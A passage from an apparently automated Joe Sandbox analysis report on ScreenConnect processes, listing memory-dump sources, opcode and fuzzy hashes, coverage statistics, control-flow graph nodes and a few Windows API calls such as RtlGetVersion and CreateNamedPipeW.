                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d185882073ec70efafa4ad328eaf876e9e15b45ead36f87cf343d01d8dbc6d96
                                                                                                                                                                                                                                                                    • Instruction ID: b47d967fec554869abb1618fd5bf9813b124ffbbda4d9e14993c702a581c10f5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d185882073ec70efafa4ad328eaf876e9e15b45ead36f87cf343d01d8dbc6d96
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD05E74A0120CFFCB50EFB9E94159EB7F9EB44210B1086ADD848D7200EF312F019B95
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.1566810300.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_10a0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0d37421aad3231504df865d6efe692c062b22c994ac9c26282a34dd458746f5c
                                                                                                                                                                                                                                                                    • Instruction ID: d84048e7968b054708a221e886d1cf9e8e9ce7828c477376f4592ef639f11e99
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d37421aad3231504df865d6efe692c062b22c994ac9c26282a34dd458746f5c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9ED05B7490120CEFDB54DFB4E94559DB7F9EB44210B1046A9E40CDB350DB715F009B51

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:9.8%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:100%
                                                                                                                                                                                                                                                                    Total number of Nodes:5
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                    execution_graph 14513 14e4c64 14515 14e4c90 14513->14515 14514 14e4cc6 14515->14514 14516 14e4d1d RtlGetVersion 14515->14516 14517 14e4dda 14516->14517

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 0 14e4c64-14e4cb3 5 14e4cb5-14e4cc4 call 14e4848 0->5 6 14e4d02-14e4d08 0->6 9 14e4d09-14e4dd8 RtlGetVersion 5->9 10 14e4cc6-14e4ccb 5->10 15 14e4dda-14e4de0 9->15 16 14e4de1-14e4e24 9->16 22 14e4cce call 14e52e8 10->22 23 14e4cce call 14e52f8 10->23 11 14e4cd4 11->6 15->16 20 14e4e2b-14e4e32 16->20 21 14e4e26 16->21 21->20 22->11 23->11
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RtlGetVersion.NTDLL(0000009C), ref: 014E4DBE
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3157748964.00000000014E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014E0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_14e0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                                                                                                    • String ID: `Qq$`Qq
                                                                                                                                                                                                                                                                    • API String ID: 1889659487-3032102428
                                                                                                                                                                                                                                                                    • Opcode ID: a839eaa4b97ef769f641193c92d287176875f11ac37bade7c2991d4fb5d019d1
                                                                                                                                                                                                                                                                    • Instruction ID: 270031ee44b300fd593afa648d6ab0f74cb0e29b40977d06404146fb647db27e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a839eaa4b97ef769f641193c92d287176875f11ac37bade7c2991d4fb5d019d1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA41B070E003199FDB649F68D808BAEBBF5FB44310F0480AAD518E7390DB754A95CF92

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 423 59b0948-59b098e 424 59b09b2-59b09bf 423->424 425 59b0990-59b09ac 423->425 426 59b09da-59b09e7 424->426 427 59b09c1-59b09d4 424->427 425->424 428 59b0e1d-59b0ede 426->428 429 59b09ed-59b09fa 426->429 427->426 433 59b0f0a-59b0f67 427->433 490 59b0ee6-59b0f09 428->490 429->428 432 59b0a00-59b0a15 429->432 434 59b0a1b-59b0a6a 432->434 435 59b0bc3-59b0c3d 432->435 434->435 447 59b0a70-59b0ad9 434->447 445 59b0c3f-59b0c63 435->445 446 59b0c7d-59b0c8e 435->446 449 59b0c94-59b0d53 445->449 446->449 475 59b0b0b-59b0bb2 447->475 476 59b0adb-59b0b09 447->476 465 59b0d67-59b0d7e 449->465 466 59b0d55-59b0d61 449->466 468 59b0dba-59b0e1c 465->468 469 59b0d80-59b0db8 465->469 466->465 469->468 486 59b0bc0-59b0bc1 475->486 487 59b0bb4 475->487 476->475 486->435 487->486
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 25ffa2f2652a1aebfde7dc2f12e278f87fe89363ab3b8d3950faecf49482e0ba
                                                                                                                                                                                                                                                                    • Instruction ID: ad623d0686951b89e2ffa834c54253475199956e4dfb3c24769fb4b058214f67
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25ffa2f2652a1aebfde7dc2f12e278f87fe89363ab3b8d3950faecf49482e0ba
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA026A35A107198FDB11DF68C940A9AB7F2FF89310F118699D549AB321EB70EE85CF81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a20c8bd29da71c18c3b0d6ed1c8b9397870e48c8cf7c49eb634867a2208cac05
                                                                                                                                                                                                                                                                    • Instruction ID: 53ee6915cc8fe470e224ede29dcbeffdc3e183c0432ebe1041f4c0047e3a323a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a20c8bd29da71c18c3b0d6ed1c8b9397870e48c8cf7c49eb634867a2208cac05
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04416B31A043458FDB06CF68D9805DABBB7FF86310B1585AAE804AF253D771E846CB90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8e77bd24d74e96715a2098d75a450cc1ece3b44d35d268f4350cb1b841a61b12
                                                                                                                                                                                                                                                                    • Instruction ID: 143b6cfd29ba964292bec3e937835ed0958abd1fa2e292db5d4f879db6e47da4
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e77bd24d74e96715a2098d75a450cc1ece3b44d35d268f4350cb1b841a61b12
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4521F1B1504204EFDF59DF54E9C0B26BFA6FB88314F208569ED090B256C336D456CBB2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0252c4b3fa9bdde0890e22b9719536d7b7e3eff305e2c3c542b70e4d3e0a114c
                                                                                                                                                                                                                                                                    • Instruction ID: ff35d2701e88eac87fd8da06e14f6e293b66107daf2d2cc9c6a090dff3a7d381
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0252c4b3fa9bdde0890e22b9719536d7b7e3eff305e2c3c542b70e4d3e0a114c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8115B32B093608FDB228F3898989CE3FB5FF9621031941ABE845CB262C6649C05C790
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                                    • Instruction ID: 608bb0943080addb0c5b50cdd9b6f38debd829a2a82cbac1b1f0c743b60a8f6c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c069b3d400d01fa3022dda7a4192202465086b1da4fe746ff97b9e65d68317
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A811AF76504284CFCF16CF54E9C4B16BF62FB84314F2486A9DD090B657C336D45ACBA2
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d7e48843903b0f04140ed8e154ea7a4b1d605ec4d3d77c05429f5388a588c194
                                                                                                                                                                                                                                                                    • Instruction ID: 74d143437252de5952e4b9a899cce104f82e810267fcea259cced4fa1b6025e7
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e48843903b0f04140ed8e154ea7a4b1d605ec4d3d77c05429f5388a588c194
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3501A771404340EEEB684E66E884767BBD8EF412A4F18C519ED594F283C7799442CBB6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3156448652.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_115d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 7b9c83751b0482bbd0c5915c79fba3e543f1346f6c626969e2960c5ca9cc2110
                                                                                                                                                                                                                                                                    • Instruction ID: 17148b4cec24137a4e832276f10f98eb752c99727768625833d00b523031a4cb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9c83751b0482bbd0c5915c79fba3e543f1346f6c626969e2960c5ca9cc2110
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2501527140D3C09FD7164B259C94752BFB4EF42224F1981DBED988F293C2695844C772
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 99cef4a65ddfe619e104bd79c3111c69289a8cc883b6369884e20dd9ee9243ef
                                                                                                                                                                                                                                                                    • Instruction ID: f511031ba58aecd0e4534c91cd5ee2984573b13a70b724851e715eb47d454abb
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99cef4a65ddfe619e104bd79c3111c69289a8cc883b6369884e20dd9ee9243ef
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37017170E151098FEB54DF68C599AEE7BF2FF44300F1094A9C4099B351E770D946CB82
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 9b0b849e8a931937e9c6a13a15ad43938009e42fd5e7ec2dd4909684fce41a6d
                                                                                                                                                                                                                                                                    • Instruction ID: e54485a0350d953316f426909eaad00c786e2a50ad27c6da4217a9c5ca5e7d44
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0b849e8a931937e9c6a13a15ad43938009e42fd5e7ec2dd4909684fce41a6d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE012C30E002098FEB44DF68C559AAE7BF6FF48304F5094A9D409DB351EA70D941CB82
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: d24212236a32263056c0e076d9cfecfd6372b090aea237dce72b3cd19b603678
                                                                                                                                                                                                                                                                    • Instruction ID: 5d939759d93ad1ae1224e4b76daa8ebbbc38cdc02390331fc793894f024108e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d24212236a32263056c0e076d9cfecfd6372b090aea237dce72b3cd19b603678
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D8E02B31204310EFE7148A19E8C089BBBF8EBC15243904179E548C7601D624FC03C7A0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ea0e782434b67be277d9713dc67580fb7c12bb661a965cbcb27ebcab7005a8e2
                                                                                                                                                                                                                                                                    • Instruction ID: afb469bbd5b23e853f6b7b37fe1f5819adfe2512913e655e1a493652d9eb57e1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ea0e782434b67be277d9713dc67580fb7c12bb661a965cbcb27ebcab7005a8e2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FE02B31B443049FE7955779A8444FE3BF2DBD222435444BFD045EB612DB669C074B90
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5ad54e790d0d217834e2dc996347728d044fa578d8888e9c2ac9f7f680897bcc
                                                                                                                                                                                                                                                                    • Instruction ID: 7a2d445cdbb202dee4ac0f2c4c85bb1fafd4767344ff3a9e4a854a2eb781fe0c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5ad54e790d0d217834e2dc996347728d044fa578d8888e9c2ac9f7f680897bcc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE0D83A3049085FC7119E59DC48CE9BBB1DFC5310309406AE415C7321CA709E06CB54
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: b265f1ec5e8a368a14c5f57db37670551e77b298fe783390c02d77131a3957f8
                                                                                                                                                                                                                                                                    • Instruction ID: eabab24385b50cd5ff56cc5580e30a7c30bf84426fa24ee6dae7d2e9d13ac636
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b265f1ec5e8a368a14c5f57db37670551e77b298fe783390c02d77131a3957f8
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE08C31304324FFA7149A1AE984C9FBBE9EBC5A64390812DE50D9B204DA60BC028BB1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e9fa1520db275d65fcba80b80e2d6791c5681ce10d7d99f2040a1bbaecd907fc
                                                                                                                                                                                                                                                                    • Instruction ID: 12cd99b99704e0531584a194da46662f38afbc4cf88253425b67b4c781253479
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9fa1520db275d65fcba80b80e2d6791c5681ce10d7d99f2040a1bbaecd907fc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FE0C2762586189FC7069B99EC94CA13FB8DF5A22030640EBFA44CB233DA71DD01E792
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c9e256c6fe370ce72ef81d2c07db0314a7de957d028ce0dd25c8648b0b71d8cf
                                                                                                                                                                                                                                                                    • Instruction ID: b6938eccc5e4283b394074aadc25a4867a921267003f14cb81f0ffe3420b4e71
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9e256c6fe370ce72ef81d2c07db0314a7de957d028ce0dd25c8648b0b71d8cf
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38D05B363005149F83049B4ED404C46BFE9DFC97213058066F519C7320CE71DC11C794
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ececeb97058cc941ad6533728c23c4c51963a16adba37e963ea5c514647525c6
                                                                                                                                                                                                                                                                    • Instruction ID: c5f3ab03a8e5968edd80a517a79c40ecc6412ce6cf77b4ab13eb2ee602e93901
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ececeb97058cc941ad6533728c23c4c51963a16adba37e963ea5c514647525c6
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6D012353105245F8745AA5DE445CDA77DDEF8D6603104067F605CB331DEB1AC10D7D4
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: ca4ed38a7f6f2196fd2fe10847d55f7c903afd825eaf7cf9031b69878aec8f16
                                                                                                                                                                                                                                                                    • Instruction ID: 5aaf837746c3d650ae6c027835fe3bcc78dc0359cd785fbc4f7d59e416e59e06
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca4ed38a7f6f2196fd2fe10847d55f7c903afd825eaf7cf9031b69878aec8f16
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70D022323000289F8708EB5DE444CA67BEDDF9D22031140A6FA08CB330CB71DC0087E0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.3171522952.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_59b0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 767ad260b93d902dd56361f4035a29628b21c71ac9e1ccdb0c9b61db6770ba8f
                                                                                                                                                                                                                                                                    • Instruction ID: 5e26d47343da43443675b74a5a084989310e501eeb2490b5880d242f5e0a79d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 767ad260b93d902dd56361f4035a29628b21c71ac9e1ccdb0c9b61db6770ba8f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:

                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                    Execution Coverage:13.6%
                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                    Signature Coverage:37.5%
                                                                                                                                                                                                                                                                    Total number of Nodes:8
                                                                                                                                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                                                                                                                                    execution_graph 12628 7ffaac463642 12629 7ffaac485c40 CreateNamedPipeW 12628->12629 12631 7ffaac485d73 12629->12631 12623 7ffaac468014 12624 7ffaac46801d 12623->12624 12625 7ffaac468082 12624->12625 12626 7ffaac4680f6 SetProcessMitigationPolicy 12624->12626 12627 7ffaac468152 12626->12627

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
